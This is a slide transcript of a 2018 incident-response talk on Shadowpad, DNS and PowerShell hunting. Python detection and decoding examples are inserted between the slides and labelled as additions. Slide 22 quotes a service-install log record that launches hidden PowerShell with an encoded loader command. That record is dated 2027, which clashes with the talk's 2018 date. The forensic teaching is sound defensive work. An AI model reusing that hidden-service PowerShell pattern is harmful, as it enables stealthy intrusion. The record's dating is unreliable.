Sergey Golovanov - Indecent Response 2018

DC7499
February 10, 2018


Transcript

  1. Indecent response 2018. Sergey @k1k_ Golovanov, Principal Security Researcher, Kaspersky Lab
  2. Challenge: find an SDC bus speed

  3. [image-only slide]
  4. Agenda: 1. Shadowpad 2. 0x403AA91EE 3. Scanner2 4. Plans

  5. 1. Shadowpad

  6. Case overview: 1. The antifraud system in a bank detects printing of a lot of elite cards over the last several hours 2. The bank starts a network audit 3. The bank discovers suspicious DNS requests 4. Forensics cannot find malware on the PCs 5. The bank asks for help…
  7. DNS requests

  8. [image-only slide]
  9. [image-only slide]
  10. “Our worldwide customers range from small businesses right up to global Fortune 500 companies.” NetSarang: American Express, Bank of America Corp., Bank of China, BNP Paribas, Citigroup, Deutsche Bank, Fortis, General Electric, ING Group, Merrill Lynch, Morgan Stanley, Shinhan Financial Group, Societe Generale, UBS. https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsarang.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru
  11. https://securelist.com/shadowpad-in-corporate-networks/81432/

  12. What was done?

  13. AutoMA – static analysis framework

  14. Shadowpad after autoMA

  15. Miniduke after autoMA

  16. 2. 0x403AA91EE

  17. Case overview:

  18. [image-only slide]
  19. [image-only slide]
  20. How to find suspicious DNS requests? sort | uniq -c | sort -rn
  21. How to find suspicious PowerShell? sort | uniq -c | sort -rn
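The two slides above use the same trick for both questions: count every value, sort by count, and read the bottom of the list. The following is an added example (not code from the talk or from the KasperskyLab/ForensicsTools repository) that does the same stacking in Python over a constructed DNS log, and then goes one step past plain stacking: tunnelled or DGA-style subdomain queries never repeat, so each one has count 1 and drowns in the long tail; grouping by base domain and counting distinct subdomains per client makes that pattern visible. The log format ("client<TAB>qname"), the `.invalid` domain, the thresholds and the function names are all assumptions made for this example.

```python
"""Least-frequent-value stacking over DNS queries, the Python equivalent of
`sort | uniq -c | sort -rn` read from the bottom, plus a per-base-domain
fan-out check.  Added example; nothing here is from the talk or from
KasperskyLab/ForensicsTools."""
from collections import Counter, defaultdict

# Constructed sample log, "<client_ip>\t<queried_name>" per line (assumed
# format, not any real resolver's output).  Host 10.0.0.21 queries four
# one-off labels under a single base domain: the shape of DNS tunnelling or
# a DGA-subdomain beacon.  Each such name appears exactly once.
DNS_LOG = """\
10.0.0.11\tupdate.microsoft.com
10.0.0.12\tupdate.microsoft.com
10.0.0.13\tupdate.microsoft.com
10.0.0.14\tupdate.microsoft.com
10.0.0.11\tmail.corp.example
10.0.0.12\tmail.corp.example
10.0.0.15\tmail.corp.example
10.0.0.13\twww.corp.example
10.0.0.21\t6b2c1e9a.c2-lookalike.invalid
10.0.0.21\t9f0d44c1.c2-lookalike.invalid
10.0.0.21\t3a7e0b12.c2-lookalike.invalid
10.0.0.21\tc4d1f8e7.c2-lookalike.invalid
10.0.0.21\tupdate.microsoft.com
"""


def parse_dns_log(text):
    """Yield (client, qname) pairs; blank or malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.strip().split("\t")
        if len(parts) == 2 and parts[1]:
            yield parts[0], parts[1].lower().rstrip(".")


def stack(values):
    """`sort | uniq -c | sort -n`: (count, value) pairs, rarest first.
    Ties are broken alphabetically so the output is deterministic."""
    counts = Counter(values)
    return sorted(((c, v) for v, c in counts.items()), key=lambda t: (t[0], t[1]))


def base_domain(qname, labels=2):
    """Last `labels` labels of a name.  Assumption for this example: no
    public-suffix list, so suffixes such as co.uk are not special-cased."""
    return ".".join(qname.split(".")[-labels:])


def subdomain_fanout(pairs):
    """Per base domain: (number of distinct names seen, sorted list of
    clients that asked).  Plain stacking hides tunnelling because every
    tunnelled name is unique; grouping by base domain surfaces it."""
    names = defaultdict(set)
    clients = defaultdict(set)
    for client, qname in pairs:
        base = base_domain(qname)
        names[base].add(qname)
        clients[base].add(client)
    return {b: (len(names[b]), sorted(clients[b])) for b in names}


def suspicious_bases(pairs, min_fanout=3, max_clients=2):
    """Base domains queried under many distinct names by only a few clients.
    Thresholds are assumptions; tune them to the size of the network."""
    fan = subdomain_fanout(pairs)
    return sorted(b for b, (n, cl) in fan.items()
                  if n >= min_fanout and len(cl) <= max_clients)


if __name__ == "__main__":
    pairs = list(parse_dns_log(DNS_LOG))
    # Bottom of the `sort -rn` list, i.e. the names that occur least often.
    for count, name in stack(q for _, q in pairs)[:5]:
        print(f"{count:6d} {name}")
    print("fan-out candidates:", suspicious_bases(pairs))
```

The same `stack()` applies unchanged to the ImagePath values of service-install events for the PowerShell question: a service binary path that appears once across the fleet is the one to open first.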
  22. parse_evtx.exe System.evtx | findstr /i "power" | more

    Record #2396788 2027.02.22-08:03:00 'Computer':'PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':'GUID', 'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':'1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA
  23. https://github.com/KasperskyLab/ForensicsTools/
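The record on slide 22 is a Service Control Manager event 7045 (service installed) whose ImagePath launches powershell.exe with `-encodedcommand`. The following is an added example, not code from the talk or from KasperskyLab/ForensicsTools: it pulls the quoted fields out of a parse_evtx-style line, finds the encoded argument, and decodes it the way PowerShell does (base64 of UTF-16LE text). The input record is constructed to mirror the slide (quotes completed, the base64 kept exactly as the slide shows it, i.e. truncated after 80 characters); the function names and the regular expressions are mine.

```python
"""Extract and decode -EncodedCommand from a Service Control Manager 7045
record.  Added example; the record below is constructed after the slide and
is not real tool output."""
import base64
import re

# Constructed record in the 'Key':'value' style of the slide.  The base64 is
# the first 80 characters shown on the slide, so the decoded script is the
# beginning of the command only.
RECORD = (
    "Record #2396788 2027.02.22-08:03:00 'Computer':'PC1', 'Channel':'System', "
    "'EventID':7045 (A service was installed in the system.), "
    "'ServiceName':'1aec4f0', "
    "'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden "
    "-encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8A"
    "cgB5AFMAdAByAGUAYQBtACgA'"
)

FIELD = re.compile(r"'(\w+)':'([^']*)'")
# PowerShell accepts any unambiguous prefix of -EncodedCommand: -e, -ec,
# -enc, -encoded...  -ep / -ex / -exec do not match because the character
# after "-e" is not in the optional group and is not whitespace.
ENCODED_ARG = re.compile(r"(?i)\s-e(?:c|n|nc|ncoded\w*)?\s+([A-Za-z0-9+/=]+)")


def parse_record(line):
    """Quoted 'Key':'value' pairs of one record, plus the numeric EventID."""
    fields = dict(FIELD.findall(line))
    m = re.search(r"'EventID':(\d+)", line)
    if m:
        fields["EventID"] = int(m.group(1))
    return fields


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of the UTF-16LE script text."""
    b64 = b64 + "=" * (-len(b64) % 4)      # tolerate stripped padding
    raw = base64.b64decode(b64)
    if len(raw) % 2:                        # truncated capture: drop odd byte
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


def extract_powershell(line):
    """For a 7045 record whose ImagePath launches PowerShell, return
    (service_name, decoded_command); decoded_command is None when no
    encoded argument is present.  Returns None for any other record."""
    fields = parse_record(line)
    if fields.get("EventID") != 7045:
        return None
    image = fields.get("ImagePath", "")
    if "powershell" not in image.lower():
        return None
    m = ENCODED_ARG.search(image)
    decoded = decode_encoded_command(m.group(1)) if m else None
    return fields.get("ServiceName"), decoded


if __name__ == "__main__":
    print(extract_powershell(RECORD))
```

The decoded prefix of the slide's payload is `$s=New-Object IO.MemoryStream(`, a script building an in-memory stream, which is the opening of a loader that never writes to disk; that, together with the hex-looking service name and the `%COMSPEC% /b /c start /b /min` wrapper, is why the full parse_evtx.exe output of every host should be stacked on ImagePath rather than grepped for one string.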

  24. 3. Scanner2

  25. Case overview: 1. No money 2. No logs 3. No team 4. No idea about network 5. CISO!
  26. What to do? We need logs, we need MFTs, we need regs
  27. WE NEED TO RECOMPILE EVERYTHING!

  28. Awesome batch file

  29. How to find something suspicious? sort | uniq -c | sort -rn
  30. https://cdn.securelist.com/files/2017/12/HappyNewYear.zip

  31. 4. PLANS

  32. 1. MFT is hell. Sleuthkit is not enough; we need more data about deleted files. 2. USN journal is required with no HDD touch. 3. Registry analysis is needed with the unallocated part.
  33. Agenda: 1. Shadowpad 2. 0x403AA91EE 3. Scanner2 4. Plans

  34. Why?

  35. [image-only slide]
  36. Thank you! Sergey @k1k_ Golovanov, Principal Security Researcher, Kaspersky Lab